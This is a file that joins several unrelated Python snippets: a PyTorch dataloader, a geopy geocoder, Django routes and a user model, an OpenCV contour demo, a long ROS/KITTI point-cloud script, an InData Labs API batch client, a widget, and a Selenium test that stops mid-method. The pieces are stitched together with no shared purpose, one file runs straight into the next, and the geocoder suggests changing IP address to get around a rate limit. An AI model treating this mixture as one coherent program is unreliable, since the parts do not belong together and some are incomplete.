def build_dataloader(dataset, sampler, batch_size, workers_per_gpu, dist=True, **kwargs):
    """Wrap *dataset* in a torch DataLoader for (distributed-only) training.

    NOTE(review): **kwargs is accepted but never forwarded to DataLoader, and
    the imported ``collate`` is unused here -- confirm whether callers rely on
    extra options being silently ignored before forwarding them.
    """
    if dist:
        num_workers = workers_per_gpu
    else:
        # Non-distributed mode has not been implemented.
        raise NotImplementedError
    data_loader = DataLoader(dataset,
                             batch_size=batch_size,
                             sampler=sampler,
                             num_workers=num_workers,
                             pin_memory=True,
                             drop_last=True,  # drop the final partial batch
                             worker_init_fn=worker_init_fn)
    return data_loader
|
from geopy import geocoders
from pandas import merge, DataFrame
import time
def geocoder(df):
    '''Takes a string of location information and geocodes the info into lat/long
    coordinates and creates a string of locations of each specimen.'''
    # Column holding the raw location strings; change to match the data.
    location_col_name = 'location'
    # Remove all rows whose location contains a literal '*'
    df = df[df[location_col_name].str.contains('\*') == 0]
    # Drop rows missing a location FIRST, then de-duplicate the column.
    # (Series.dropna() takes no ``subset`` argument, so the original
    # ``df[col].drop_duplicates().dropna(subset=[col])`` raised TypeError.)
    no_location_dup = df.dropna(subset=[location_col_name])[location_col_name].drop_duplicates()
    # Accumulators for the geocoded results
    geoCodeAddress, geoLat, geoLng, rawLocation = [], [], [], []
    # Geocode each unique location (Python 3 print() calls; the original
    # used Python 2 print statements).
    for index, location in enumerate(no_location_dup):
        if index == 2498:  # change to 2498 if not testing
            print('Maximum requests reached. Rerun again in 24 hours or change ip address\n')
            break
        else:
            try:
                time.sleep(.50)  # throttle to stay under the rate limit
                g = geocoders.GoogleV3()
                place, (lat, lng) = g.geocode(location)
                geoCodeAddress.append(place)
                geoLat.append(lat)
                geoLng.append(lng)
                rawLocation.append(location)
                print(place)  # remove when not testing
            except Exception:
                # Failed lookups are skipped; the row simply stays un-geocoded.
                # (Narrowed from a bare except, which also caught Ctrl-C.)
                print('passing on', location)
    #del df['latitude'], df['longitude']
    # Build a DataFrame from the geocoded values
    geo_geocoded = DataFrame({location_col_name: rawLocation,
                              'geocoded': geoCodeAddress,
                              'latitude': geoLat,
                              'longitude': geoLng})
    # Merge the original data and the geocoded dataset on the location column
    return merge(df, geo_geocoded, on=location_col_name, how='outer')
|
from django.urls import path
from .views import IndexView, PostDetailView, ArchivesView, CategoryView, TagView, search
app_name = 'blog'  # URL namespace used for {% url 'blog:...' %} reversing

# Route table for the blog app: class-based views plus a function-based search.
urlpatterns = [
    path('', IndexView.as_view(), name='index'),
    path('post/<int:pk>/', PostDetailView.as_view(), name='detail'),
    path('archives/<int:year>/<int:month>/', ArchivesView.as_view(), name='archives'),
    path('category/<int:pk>/', CategoryView.as_view(), name='category'),
    path('tag/<int:pk>/', TagView.as_view(), name='tag'),
    path('search/', search, name='search'),
]
|
from django.contrib.auth.base_user import BaseUserManager
from django.db import models
from db.base_model import BaseModel
from django.contrib.auth.models import AbstractUser
# Create your models here.
class UgcUserManager(BaseUserManager):
    """Manager that creates UgcUser rows from a username and password."""
    use_in_migrations = True

    def _create_user(self, username, password, **extra_fields):
        # Username and password are both required; the user-facing error
        # messages are intentionally left in Chinese.
        if not username:
            raise ValueError("请填入用户名")
        if not password:
            raise ValueError("请填入密码")
        user = self.model(username=username, **extra_fields)
        user.set_password(password)  # hashes instead of storing plaintext
        user.save(using=self._db)
        return user

    def create_user(self, username, password, **extra_fields):
        """Create a regular (non-staff, non-superuser) account."""
        extra_fields.setdefault('is_staff', False)
        extra_fields.setdefault('is_superuser', False)
        return self._create_user(username, password, **extra_fields)

    def create_superuser(self, username, password, **extra_fields):
        """Create a superuser; is_staff/is_superuser may not be forced False."""
        extra_fields.setdefault('is_staff', True)
        extra_fields.setdefault('is_superuser', True)
        if extra_fields.get('is_staff') is not True:
            raise ValueError("Superuser must have is_staff=True")
        if extra_fields.get('is_superuser') is not True:
            raise ValueError('Superuser must have is_superuser=True')
        return self._create_user(username, password, **extra_fields)
class UgcUser(AbstractUser):
    """UGC user table (original docstring: ugc用户表)."""
    # National ID-card number; unique per user
    identity = models.CharField(max_length=18, unique=True, verbose_name='身份证号')
    # Accumulated points/score
    score = models.IntegerField(default=0, verbose_name='积分')
    # Real name
    name = models.CharField(max_length=10, verbose_name='真实姓名')
    # Mobile phone number; unique per user
    phone = models.CharField(max_length=11, verbose_name='手机号', unique=True)
    # phone/email/username serve as the USERNAME_FIELD family instead of the
    # default username alone, so username is redeclared here
    username = models.CharField(max_length=150, verbose_name='用户名', unique=True)
    USERNAME_FIELD = 'username'
    REQUIRED_FIELDS = ['phone', 'email']
    # Custom manager: creates users from phone, email, username and password
    objects = UgcUserManager()

    class Meta:
        unique_together = ['email', 'phone']
        db_table = 'ugc_user'
        verbose_name = 'ugc用户表'
        verbose_name_plural = verbose_name
|
import cv2
import numpy as np
import imutils

# Load a fixed test image; work on a grayscale copy for edge detection while
# keeping the colour original for drawing results.
imag = cv2.imread('/home/frkn/Desktop/fotolar/solalt.png')
image = cv2.cvtColor(imag,cv2.COLOR_BGR2GRAY)
# Resize both to the same width so the display windows match.
imag = imutils.resize(imag,width=750)
image = imutils.resize(image,width=750)
# Bilateral filter smooths noise while preserving edges, then Canny edges.
filtered_image= cv2.bilateralFilter(image,11,17,17)
canny = cv2.Canny(filtered_image,100,150)
# Blank canvases for the contour drawings.
drawing = np.zeros(imag.shape,np.uint8)
drawing_2 = np.zeros(imag.shape,np.uint8)
# NOTE(review): 3-value unpacking matches the OpenCV 3.x findContours API;
# OpenCV 4.x returns only (contours, hierarchy) -- confirm the pinned version.
image2,contours,hierarchy = cv2.findContours(canny.copy(),cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
# First pass: raw contours only.
for cnt in contours :
    cv2.drawContours(drawing_2,[cnt],-1,(0,255,0),3)
cv2.imshow('output_2',drawing_2)
# Second pass: raw contour on the canvas, convex hull on the colour image.
for cnt in contours :
    hull = cv2.convexHull(cnt)
    cv2.drawContours(drawing,[cnt],-1,(0,255,0),3)
    cv2.drawContours(imag,[hull],-1,(0,255,0),3)
cv2.imshow('output',drawing)
print(len(contours))
print (contours)
#print(len(selected_contour))
cv2.imshow('original',imag)
cv2.imshow('filtered image',filtered_image)
cv2.imshow('canny',canny)
cv2.waitKey(0)
|
#!/usr/bin/env python
import rospy
from roslib import message
import rosbag
import std_msgs.msg
import sensor_msgs.point_cloud2 as pc2
from sensor_msgs.msg import PointCloud2, PointField
import numpy as np
# require the installation of ros-kinetic-tf2_sensor_msgs
from tf2_sensor_msgs.tf2_sensor_msgs import do_transform_cloud
# require the installation of transforms3d
import transforms3d
# require the installation of sympy
import sympy as sp
# from sympy import *
import subprocess
import tf
import math
from numpy.linalg import inv
import sys
import os
def process():
    """Replay a KITTI rosbag, fuse GICP odometry with OXTS GPS/IMU poses,
    transform every velodyne scan into the world frame and publish the
    accumulated cloud on /gicp_visu for rviz.

    Python 2 script (bare `print` statements). Paths, frame counts and the
    bag name are hard-coded for one KITTI sequence.
    """
    # pub = rospy.Publisher('velodyne_point_data', String, queue_size=10)
    # while not rospy.is_shutdown():
    rospy.init_node('test_velodyne',anonymous=True)
    # bag_name should be the same for both rosbag and gicp_simplified_result
    bag_name = "kitti_2011_09_26_drive_0005_synced"
    bag_dir = "/home/cuberick/raw_data/rosbag/%s.bag" % (bag_name)
    gicp_output_dir = "/home/cuberick/raw_data/gicp_simplified_output/%s.txt" % (bag_name)
    bag = rosbag.Bag(bag_dir)
    interval = 1
    density = 50
    duration = rospy.Duration(0.1,0)
    number_of_frame = 152
    # lengh_of_oxts = number_of_frame
    # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    # Read IMU-to-Velodyne Transformation Matrix
    tcount = 1
    print ("===============================================")
    print ("|             ---PROGRAM START---             |")
    print ("|                                             |")
    print ("|                                             |")
    print ("|                                             |")
    print ("|             Ver.gicp_incremental            |")
    print ("===============================================")
    print
    print
    sys.stdout.write("KITTI sequence: %s" % bag_name)
    print
    sys.stdout.write("Frame interval: %d, Point density: %d" % (interval, density) )
    # sys.stdout.flush()
    print
    print
    print ("Bag LOADED")
    print ("Please launch rviz")
    print
    print
    sys.stdout.write("\r>>>Read tf info")
    sys.stdout.flush()
    # print
    for topic, msg, t in bag.read_messages("/tf_static"):
        # if tcount < 1:
        #     break
        # tcount -= 1
        # print count
        All_tfs = msg.transforms
    # Extract T_imu_to_velo
    for transf in All_tfs:
        if transf.child_frame_id == "velo_link":
            T_imu_to_velo = transf.transform
    # Transform between quaternion and Euler
    T_imu_to_velo_Quaternion_rotation = T_imu_to_velo.rotation
    T_imu_to_velo_translation = T_imu_to_velo.translation
    # print(T_imu_to_velo_Quaternion_rotation)
    quaternion = (
        T_imu_to_velo_Quaternion_rotation.x,
        T_imu_to_velo_Quaternion_rotation.y,
        T_imu_to_velo_Quaternion_rotation.z,
        T_imu_to_velo_Quaternion_rotation.w)
    T_imu_to_velo_Euler_rotaiton = tf.transformations.euler_from_quaternion(quaternion)
    # print(T_imu_to_velo_Euler_rotaiton)
    roll = T_imu_to_velo_Euler_rotaiton[0]
    pitch = T_imu_to_velo_Euler_rotaiton[1]
    yaw = T_imu_to_velo_Euler_rotaiton[2]
    # Build the homogeneous IMU->velodyne transform from the Euler angles
    # and (negated) translation.
    T_imu_to_velo_homo = np.empty([4,4],dtype=float)
    T_imu_to_velo_homo = [[math.cos(yaw)*math.cos(pitch),
                           -math.cos(yaw)*math.sin(pitch)*math.sin(roll)+math.sin(yaw)*math.cos(roll),
                           -math.cos(yaw)*math.sin(pitch)*math.cos(roll)-math.sin(yaw)*math.sin(roll),
                           -T_imu_to_velo_translation.x],
                          [-math.sin(yaw)*math.cos(pitch),
                           math.sin(yaw)*math.sin(pitch)*math.sin(roll)+math.cos(yaw)*math.cos(roll),
                           -math.sin(yaw)*math.sin(pitch)*math.cos(roll)+math.cos(yaw)*math.sin(roll),
                           -T_imu_to_velo_translation.y],
                          [math.sin(pitch),
                           -math.cos(pitch)*math.sin(roll),
                           math.cos(pitch)*math.cos(roll),
                           -T_imu_to_velo_translation.z],
                          [0, 0, 0, 1] ]
    # print T_imu_to_velo_homo
    sys.stdout.write("\r   T_imu_to_velo obtained")
    sys.stdout.flush()
    # print ("   T_imu_to_velo obtained")
    # print
    # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    # ---->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    # Obtain gicp results
    sys.stdout.write("\r>>>Read GICP raw data")
    sys.stdout.flush()
    gicp_raw = np.loadtxt(gicp_output_dir)
    gicp_row_length = np.shape(gicp_raw)[0]
    pose_icp = [None] * number_of_frame
    pose_icp[0] = np.matrix([[1,0,0,0],[0,1,0,0],[0,0,1,0],[0,0,0,1]])
    pose_icp_incr = [None] * number_of_frame
    pose_icp_incr[0] = np.matrix([[1,0,0,0],[0,1,0,0],[0,0,1,0],[0,0,0,1]])
    i = 0
    current_starting_row = 0
    current_ending_row = 0
    accumulate_tf = pose_icp[0]
    # Each GICP result is a 4x4 block of rows; chain them to get absolute
    # poses (pose_icp) while keeping the frame-to-frame increments.
    for i in range(number_of_frame - 1):
        current_starting_row = i * 4 + 0
        current_ending_row = i * 4 + 3
        current_pose_row_0 = gicp_raw[current_starting_row , :]
        current_pose_row_1 = gicp_raw[current_starting_row + 1 , :]
        current_pose_row_2 = gicp_raw[current_starting_row + 2 , :]
        current_pose_row_3 = gicp_raw[current_starting_row + 3 , :]
        current_pose = np.zeros(shape = (4,4))
        current = np.matrix([current_pose_row_0,current_pose_row_1,current_pose_row_2,current_pose_row_3])
        accumulate_tf = current.dot(accumulate_tf)
        pose_icp[i+1] = accumulate_tf
        pose_icp_incr[i+1] = current
        # print current_starting_row
        # print i
    # ---->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    # include Tr matrix
    pose_icp_T = [None] * number_of_frame
    pose_icp_incr_T = [None] * number_of_frame
    for i in range(number_of_frame-1):
        transfer_pose = np.empty((4,4,))
        # print (T_imu_to_velo_homo)
        # print
        # print(pose[i])
        transfer_pose = np.dot(T_imu_to_velo_homo, pose_icp[i])
        transfer_pose_incr = np.dot(T_imu_to_velo_homo, pose_icp_incr[i])
        pose_icp_T[i] = np.empty((4,4,))
        pose_icp_T[i] = transfer_pose
        pose_icp_incr_T[i] = np.empty((4,4,))
        pose_icp_incr_T[i] = transfer_pose_incr
    sys.stdout.write("\r   Pose_GICP data obtained")
    sys.stdout.flush()
    # rospy.sleep(0.5)  # Sleeps for 1 sec
    # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    # Read OXTS data
    OXTS_GPS_raw = np.empty([1,3],dtype=float)
    gcount = 1
    sys.stdout.write("\r>>>Read OXTS GPS raw data")
    sys.stdout.flush()
    # print
    # rospy.sleep(0.5)  # Sleeps for 1 sec
    for topic, msg, t in bag.read_messages("/kitti/oxts/gps/fix"):
        # if gcount < 1:
        #     break
        # gcount -= 1
        current_GPS_data = [msg.latitude, msg.longitude, msg.altitude]
        OXTS_GPS_raw = np.vstack([OXTS_GPS_raw , current_GPS_data])
    # Drop the np.empty seed row.
    OXTS_GPS_raw = np.delete(OXTS_GPS_raw, (0), axis=0)
    sys.stdout.write("\r   OSTX GPS raw data obtained")
    # print
    # print(OXTS_GPS_raw)
    sys.stdout.write("\r>>>Read OXTS IMU data")
    sys.stdout.flush()
    # print
    OXTS_IMU_raw = np.empty([1,3],dtype=float)
    icount = 3
    for topic, msg, t in bag.read_messages("/kitti/oxts/imu"):
        # if icount < 1:
        #     break
        # icount -= 1
        # print msg
        IMU_raw = msg.orientation
        quaternion_IMU = (
            IMU_raw.x,
            IMU_raw.y,
            IMU_raw.z,
            IMU_raw.w)
        IMU_data = tf.transformations.euler_from_quaternion(quaternion_IMU)
        IMU_roll = IMU_data[0]
        IMU_pitch = IMU_data[1]
        IMU_heading = IMU_data[2]
        OXTS_IMU_raw = np.vstack([OXTS_IMU_raw , [IMU_roll, IMU_pitch, IMU_heading]])
        # print IMU_data
    OXTS_IMU_raw = np.delete(OXTS_IMU_raw, (0), axis=0)
    # print OXTS_IMU_raw
    sys.stdout.write("\r   OXTS_IMU data obtained")
    sys.stdout.flush()
    # print
    # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    # Calculate pose (loadOxtsliteData and convertOxtsToPose)
    # compute scale from first lat value
    oxts_first = OXTS_GPS_raw[0][0]
    scale = math.cos (oxts_first * math.pi / 180.00)
    # print scale
    # OXTS_GPS_raw [1] [2] [3] and OXTS_IMU_raw [1] [2] [3]
    oxts = np.concatenate ((OXTS_GPS_raw, OXTS_IMU_raw), axis = 1)
    # print oxts
    lengh_of_oxts = np.shape(oxts)[0]
    # print lengh_of_oxts
    pose_gps = [None] * lengh_of_oxts
    Tr_0_inv = np.zeros(shape = (4,4))
    isempty = np.zeros(shape = (4,4))
    # a = oxts[0]
    # print(a)
    i = 0
    # Mercator projection of lat/lon plus altitude -> translation t;
    # roll/pitch/yaw -> rotation R; poses are made relative to the first one.
    for i in range(lengh_of_oxts-1):
        if oxts[i] == []:
            pose_gps[i] = np.empty((3,3,)) * np.nan
            continue
        t = np.empty((3,1,))
        current_oxts_1 = oxts[i][0]
        current_oxts_2 = oxts[i][1]
        er = 6378137
        current_t_11 = scale * current_oxts_2 * math.pi * er / 180
        current_t_12 = scale * er * math.log(math.tan( (90+ current_oxts_1) * math.pi / 360 ))
        current_t_13 = oxts[i][2]
        t = [[current_t_11], [current_t_12], [current_t_13]]
        # print t
        # print
        # print i
        # print(oxts[i])
        rx = oxts[i][3]
        ry = oxts[i][4]
        rz = oxts[i][5]
        # print (rx)
        # print (ry)
        # print (rz)
        Rx = np.matrix([[1, 0, 0], [0, math.cos(rx), -math.sin(rx)], [0, math.sin(rx), math.cos(rx)]])
        Ry = np.matrix([[math.cos(ry), 0, math.sin(ry)], [0, 1, 0], [-math.sin(ry), 0, math.cos(ry)]])
        Rz = np.matrix([[math.cos(rz), -math.sin(rz), 0], [math.sin(rz), math.cos(rz), 0], [0, 0, 1]])
        R = np.empty((3,3,))
        R = np.dot(np.dot(Rz,Ry),Rx)
        # print (Rx)
        # print (Ry)
        # print (Rz)
        # print R
        # print
        current_matrix = np.zeros(shape = (4,4))
        first_three_row = np.concatenate ((R,t), axis =1)
        current_matrix = np.vstack([first_three_row, [0,0,0,1]])
        # print first_three_row
        if np.array_equal(Tr_0_inv,isempty):
            # print "enter if statement"
            # print i
            Tr_0_inv = inv(current_matrix)
        # if i == 0:
        #     print Tr_0_inv
        # print four_rows
        current_pose = np.empty((4,4,))
        current_pose = Tr_0_inv.dot(current_matrix)
        pose_gps[i] = current_pose
        # print i
        # print oxts[i]
        # print pose[i]
        # raw_input("press ehnter to continue")
    # ---->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    # include Tr matrix
    pose_gps_T = [None] * lengh_of_oxts
    for i in range(lengh_of_oxts-1):
        transfer_pose = np.empty((4,4,))
        # print (T_imu_to_velo_homo)
        # print
        # print(pose[i])
        transfer_pose = np.dot(T_imu_to_velo_homo, pose_gps[i])
        pose_gps_T[i] = np.empty((4,4,))
        pose_gps_T[i] = transfer_pose
    sys.stdout.write("\r   Pose_GPS data obtained")
    sys.stdout.flush()
    frame = 0
    frame_count = 0
    frame_counts = 0
    total_frames = 0
    frames_left = 0
    skipped_count = 0
    rejected_count = 0
    # for frame in range(0,interval,len(pose_T)):
    # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    # Data summary:
    # pose_icp_T      - gicp pose data with Tr transform
    # pose_icp_incr_T - incremental pose data
    # pose_gps_T      - gps pose data with Tr transform
    # pose_T the original variable used, now it is modified
    # pose_T should be the ekf pose result
    # Compare data size
    if len(pose_icp_T) < len(pose_gps_T):
        frameNo = len(pose_icp_T)
    else:
        frameNo = len(pose_gps_T)
    # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    # Read velodyne info
    sys.stdout.write("\r>>>Read Velodyne point data")
    sys.stdout.flush()
    print;print
    # all_points = np.empty([1,3],dtype=float)
    current_point_set = np.empty((999999,3,)) * np.NaN
    vcount = 5
    bag_count = -1
    total_msg_no = 0
    # First pass: count scans so all_points can be pre-sized.
    for topic, msg, t in bag.read_messages("/kitti/velo/pointcloud"):
        # bag_count += 1
        # if (bag_count) % interval != 0:
        #     continue
        total_msg_no += 1
    all_points = [np.empty([1,4],dtype=float)] * total_msg_no
    # Second pass: subsample each scan (1 in `density` points) and move the
    # points into the world frame using the matching GICP pose.
    for topic, msg, t in bag.read_messages("/kitti/velo/pointcloud"):
        # transformed_points = np.empty((1,3,))
        transformed_points = np.empty((999999,3,)) * np.NaN
        bag_count += 1
        # if (bag_count) % interval != 0:
        #     continue
        # if vcount < 1:
        #     break
        # vcount -= 1
        # print("counting cycles")
        # print vcount
        frame_count += 1
        total_frames = len(pose_icp_T) / interval
        total_frames = math.ceil(total_frames)
        frames_left = total_frames - frame_count + 1
        info_of_frame = "Processing scan No.%d , %d remaining" % (frame_count,frames_left)
        sys.stdout.write("\r%s" % info_of_frame)
        sys.stdout.flush()
        # sys.stdout.write("   ~~~~~~working hard >.< please wait!~~~~~~~")
        # print
        # print vcount
        data_length = len(msg.data)
        ## msg is of type PointCloud2
        raw_data = pc2.read_points(msg)
        point_count_raw = 0
        for point in raw_data:
            current_point = [point[0], point[1], point[2]]
            # if point[0] > 4:
            try:
                # print point_count_raw
                # print current_point
                current_point_set[point_count_raw] = current_point
                point_count_raw += 1
            except:
                # print ".^. skip recording this point"
                skipped_count += 1
                continue
        current_point_set = np.delete(current_point_set, (0), axis=0)
        current_point_set = current_point_set[~np.isnan(current_point_set).any(axis=1)]
        velo = current_point_set
        if np.shape(velo)[0] < 2:
            continue
        j = 0
        point_count = -1
        for j in range(np.shape(velo)[0]):
            try:
                point_count += 1
                if (point_count + 1 ) % density != 0:
                    continue
                # print;print pose_ekf
                pose_a = pose_icp_T[bag_count]
                point = velo[j]
                point_a = point[np.newaxis, :].T
                # print point_a
                point_b = np.vstack([point_a, [1]])
                point_c = np.dot(pose_a, point_b)
                point_c = point_c[np.newaxis, :].T
                point_c = np.delete(point_c, [3], axis=1)
                # print; print point_c
                transformed_points[j] = point_c
            except:
                # print;print "except"
                continue
        transformed_points = transformed_points[~np.isnan(transformed_points).any(axis=1)]
        # print; print transformed_points
        try:
            transformed_points = np.delete(transformed_points, (0), axis=0)
        except:
            continue
        all_points[frame_count-1] = transformed_points
        all_points[frame_count-1] = np.delete(all_points[frame_count-1], (0), axis=0)
        # all_points = np.vstack([all_points, transformed_points])
        # all_points = np.delete(all_points, (0), axis=0)
        # print(all_points)
        # a = all_points.shape
        # print(a)
        # print frame_count
    sys.stdout.write("\rVelodyne point data processing finished")
    sys.stdout.flush()
    # bag.close()
    # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    # ---->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    # pose =
    # subprocess.call(['spd-say','start publishing'])
    # print all_points
    # print
    # print(">>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
    # prsint(">>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
    sys.stdout.write("\rProcessing completed, generating system report")
    # print
    # sys.stdout.flush()
    # print
    # a = type(all_points)
    b = np.shape(all_points)
    # print;print a
    sys.stdout.write("   Total frames:")
    print b[0]
    sys.stdout.write("   Skipped points:")
    print skipped_count
    sys.stdout.write("   Rejected points:")
    print rejected_count
    print
    # print
    # print ("Start visualising...")
    pcl_pub = rospy.Publisher("/gicp_visu", PointCloud2, queue_size = 10)
    rospy.loginfo("Publisher started at: /gicp_visu")
    rospy.sleep(1.)
    rospy.loginfo("Publishing...")
    print
    print
    print
    bag.close()
    current_visual_set = np.empty([1,3])
    # Replay loop: on every <enter>, re-publish the accumulated cloud frame
    # by frame so rviz shows the map growing.
    while (1):
        raw_input("\r... waiting for instruction")
        # sys.stdout.write("Start visualising...")
        sys.stdout.flush()
        current_visual_set = np.empty([1,3])
        k = 0
        for k in range(total_msg_no):
            sys.stdout.write("\rVisualising frame %d" %k)
            sys.stdout.flush()
            header = std_msgs.msg.Header()
            header.stamp = rospy.Time.now()
            header.frame_id = 'map'
            fields = [PointField('x', 0, PointField.FLOAT32, 1),
                      PointField('y', 4, PointField.FLOAT32, 1),
                      PointField('z', 8, PointField.FLOAT32, 1),
                      PointField('i', 12, PointField.FLOAT32, 1)]
            try:
                current_visual_set = np.concatenate((current_visual_set, all_points[k]))
                # a = type(current_visual_set)
                # print;print a
            except:
                continue
            current_visual_set_list = current_visual_set.tolist()
            # print all_points
            processed_data = pc2.create_cloud_xyz32(header, current_visual_set_list)
            rospy.sleep(duration)
            # [[1, 1, 1]]
            # a = [[1, 1, 1]]
            # b = type(a)
            # print b
            pcl_pub.publish(processed_data)
        sys.stdout.write("\rVisualisation complete")
        sys.stdout.flush()
    # print
    # print
    # def publish_odom(self,rtom_list):
if __name__ == '__main__':
    # Clear the terminal (Windows vs POSIX) before the banner prints.
    os.system('cls' if os.name == 'nt' else 'clear')
    try:
        process()
    except rospy.ROSInterruptException:
        # Normal shutdown path when ROS interrupts the node.
        pass
import requests
import os
import io
import json
import time
import configparser
def main():
    """Batch-submit JSON message dumps to the InData Labs interests API.

    Reads settings from config.ini, walks every subdirectory of the data
    directory, builds one text blob per *.json file, truncates it to the
    API limit, posts it, stores the response alongside a copy of the text,
    and throttles to stay under the per-minute request quota.
    """
    config = configparser.ConfigParser()
    config.read('config.ini')
    # 1. Define raw directory, max length of the json message raw and the number of api units
    data_dir_name = config['DEFAULT']['DATA_DIR_NAME']
    results_dir_name = config['DEFAULT']['RESULTS_DIR_NAME']
    max_length = int(config['IDL']['IDL_MAX_LENGTH'])
    api_units_left = int(config['IDL']['IDL_API_UNITS_LEFT'])  # the starting number of units every day
    max_requests_per_min = int(config['DEFAULT']['MAX_REQUESTS_PER_MIN'])
    idl_api_key = config['IDL']['IDL_API_KEY']
    # walk the directory; the top-level directory itself is skipped
    for root_dir_name, subdir_list, file_list in os.walk(data_dir_name):
        base_dir_name = os.path.basename(root_dir_name)
        if base_dir_name == data_dir_name:
            continue
        print('Processing directory: %s' % base_dir_name)
        processed_file_count = 1
        file_count = len(file_list)
        # 2. For each json file in the directory
        for filename in file_list:
            print('Processing {}/{}'.format(processed_file_count, file_count))
            processed_file_count += 1
            if not filename.endswith('.json'):
                continue
            # BUG FIX: these files live in the walked subdirectory, so join
            # with root_dir_name; joining with data_dir_name produced paths
            # that do not exist for nested files.
            filepath = os.path.join(root_dir_name, filename)
            # 3. build single string of text
            text = build_text(filepath)
            # 4. make sure its within the size limit
            truncated_text = truncate_text_to_limit(filepath, text, max_length)
            # 5. make sure we haven't hit our API limit
            if api_units_left <= 0:
                print('API Units exhausted.')
                exit(1)
            # 6. send text array to the vendor
            results = send_text_to_idl(idl_api_key, filepath, truncated_text)
            response_json = results.json()
            if results.status_code != requests.codes.ok:
                print('Error processing: {}'.format(filepath))
                print('Error: {}'.format(response_json))
            else:
                # BUG FIX: only read request/units_left on success; error
                # payloads are not guaranteed to carry those keys.
                api_units_left = response_json['request']['units_left']
                # 7. create a results text file with the json and the text array
                write_results_to_file(results_dir_name, filename, response_json, text)
                check_for_significant_interests(filename, response_json['response'][0]['interests'])
            # 8. throttle so we don't exceed our rate limit
            time.sleep(60 / max_requests_per_min)
def build_text_list(filepath):
    """Return the 'message' field of every record in the JSON file *filepath*."""
    with open(filepath, 'r') as f:
        datastore = json.load(f)
    return [record['message'] for record in datastore]
def build_text(filepath):
    """Concatenate the 'message' field of every record in *filepath*.

    The file must contain a JSON array of objects that each carry a
    'message' key. Returns one joined string (empty for an empty array).
    """
    with open(filepath, 'r') as f:
        datastore = json.load(f)
    # str.join avoids the quadratic cost of repeated += concatenation.
    return ''.join(record['message'] for record in datastore)
def truncate_text_to_limit(filepath, text, max_length):
    """Cap *text* at *max_length* UTF-8 bytes, logging the file when it happens.

    BUG FIX: the original measured the limit in bytes but sliced by
    characters (text[:max_length]), so multi-byte text could still exceed
    the API size limit. Truncation is now done on the encoded bytes, with
    any partial trailing character dropped.
    """
    if len(text.encode('utf-8')) > max_length:
        print("Truncating: {}".format(filepath))
        text = text.encode('utf-8')[:max_length].decode('utf-8', 'ignore')
    return text
def utf8len(s):
    """Return how many bytes *s* occupies when encoded as UTF-8."""
    return len(bytearray(s, 'utf-8'))
def send_text_to_idl(idl_api_key, filepath, text):
    """POST *text* to the InData Labs 'interests' model and return the response.

    *filepath* is accepted for signature compatibility but not used here.
    """
    query = {'apikey': idl_api_key, 'models': 'interests'}
    body = {'texts': [text]}
    return requests.post('https://api.indatalabs.com/v1/text', params=query, json=body)
def write_results_to_file(results_dir_name, filename, result_json, text):
    """Write the API response JSON followed by the submitted text to
    <results_dir_name>/<filename>.results.txt (UTF-8)."""
    result_filepath = results_dir_name + '/' + filename + '.results.txt'
    with io.open(result_filepath, 'w+', encoding='UTF-8') as out:
        out.write('API RESPONSE:\n')
        json.dump(result_json, out, sort_keys=True, indent=4, ensure_ascii=False)
        out.write('\nMESSAGE CONTENT:\n')
        out.write(text)
def check_for_significant_interests(filename, interests):
    """Print *filename* together with any interests scored >= 1.0.

    *interests* is expected to be a mapping of interest name -> score.
    Malformed payloads (non-mapping, non-numeric scores) are ignored,
    preserving the original best-effort intent.
    """
    significant_interests = []
    try:
        for k, v in interests.items():
            if v >= 1.0:
                significant_interests.append([k, v])
    except (AttributeError, TypeError):
        # Narrowed from a bare `except Exception: pass`: only payload-shape
        # failures are swallowed now, so genuine bugs surface.
        return
    if len(significant_interests) > 0:
        print('{} has significant interests: {}'.format(filename, significant_interests))
def test_call_to_idl(idl_api_key):
    """Fire a canned two-text request at the API and print URL plus reply.

    Manual smoke test for connectivity and the API key; makes a call to
    https://api.indatalabs.com/v1/text.
    """
    query = {'apikey': idl_api_key, 'models': 'interests'}
    body = {
        "texts": [
            "Regardless of the industry, Data Science and Artificial Intelligence promise to reshape the way we do our jobs every day. At InData Labs we seek to bring the power of raw science & AI to our customers.",
            "Whether you want to explore the possible use cases for big raw analytics or have an AI solution in mind and want to start quickly, our team of world-class raw scientists and raw engineers can help you achieve big raw success and get the most out of your investment."
        ]
    }
    response = requests.post('https://api.indatalabs.com/v1/text', params=query, json=body)
    print(response.url)
    print(response.json())
# Entry point: process all message dumps when run as a script.
if __name__ == '__main__':
    main()
|
from zoom.component import DynamicComponent
class ProgressWidget(DynamicComponent):
    """ProgressWidget

    >>> progress = ProgressWidget()
    >>> component = progress.format(
    ...     title='Widget Title',
    ...     hint='Widget hint',
    ...     percent=75,
    ...     color='blue',
    ... )
    """

    def format(self, percent, title='value title', hint='', color='#337ab7'):
        # Collect the widget settings and delegate the actual rendering to
        # DynamicComponent.format.
        settings = dict(percent=percent, title=title, hint=hint, color=color)
        return DynamicComponent.format(self, **settings)
|
import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options
class EdurekaOrg(unittest.TestCase):
    """Selenium smoke tests for the demo web app (headless Firefox):
    page headings plus the About/Products/Contact navigation links."""

    def setUp(self):
        """Start a fresh headless Firefox session for each test."""
        options = Options()
        options.headless = True
        self.driver = webdriver.Firefox(
            options=options, executable_path="/usr/local/bin/geckodriver")

    def _open_home(self):
        """Navigate to the application root and return the driver."""
        driver = self.driver
